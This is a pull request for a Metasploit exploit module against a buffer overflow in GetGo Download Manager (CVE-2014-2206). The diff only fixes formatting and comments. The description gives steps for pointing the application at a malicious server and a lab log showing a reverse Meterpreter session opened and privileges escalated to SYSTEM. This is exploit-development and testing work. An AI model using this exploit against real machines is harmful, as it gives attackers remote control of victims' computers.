### PR TITLE
Add module for GetGo Download Manager (CVE-2014-2206)

### DIFF
--- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb
+++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'ExitFunction' => 'process',
-          'URIPATH' => "/shakeitoff.mp3"
+          'URIPATH'      => "/shakeitoff.mp3"
         },
       'Platform'       => 'win',
       'Payload'        =>
@@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   #
-  # Handle the HTTP request and return a response.  Code borrorwed from:
-  # msf/core/exploit/http/server.rb
+  # Handle the HTTP request and return a response.
+  # Code borrowed from: msf/core/exploit/http/server.rb
   #
   def start_http(opts={})
     # Ensture all dependencies are present before initializing HTTP
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
       datastore['SSL'],
       {
         'Msf'        => framework,
-        'MsfExploit' => self,
+        'MsfExploit' => self
       },
       opts['Comm'],
       datastore['SSLCert']
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
     @service_path = uopts['Path']
     @http_service.add_resource(uopts['Path'], uopts)
 
-    # As long as we have the http_service object, we will keep the ftp server alive
+    # As long as we have the http_service object, we will keep the server alive
     while @http_service
       select(nil, nil, nil, 1)
     end


### PR DESCRIPTION
This is an MSF port of http://www.exploit-db.com/exploits/32132. The module exploits a stack-based buffer overflow vulnerability in GetGo Download Manager version 4.9.0.1982 and earlier. The vulnerable application is available for download at http://getgo-download-manager.en.softonic.com/.
# Verification Steps
- [x] Start the malicious server
- [x] Copy an URL pointing to the malicious server (eg. http://192.168.186.129:8080/music.mp3)
- [x] In the application press right click and choose Paste link

Tested on Windows XP SP3, test run results below:

```
msf > use exploit/windows/browser/getgodm_http_response_bof
msf exploit(getgodm_http_response_bof) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.186.129:4444 
[*] Server started.
msf exploit(getgodm_http_response_bof) > [*] Sending 6128 bytes to 192.168.186.130:1050...
[*] Sending stage (770048 bytes) to 192.168.186.130
[*] Meterpreter session 1 opened (192.168.186.129:4444 -> 192.168.186.130:1051) at 2015-01-14 21:39:05 +0100
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
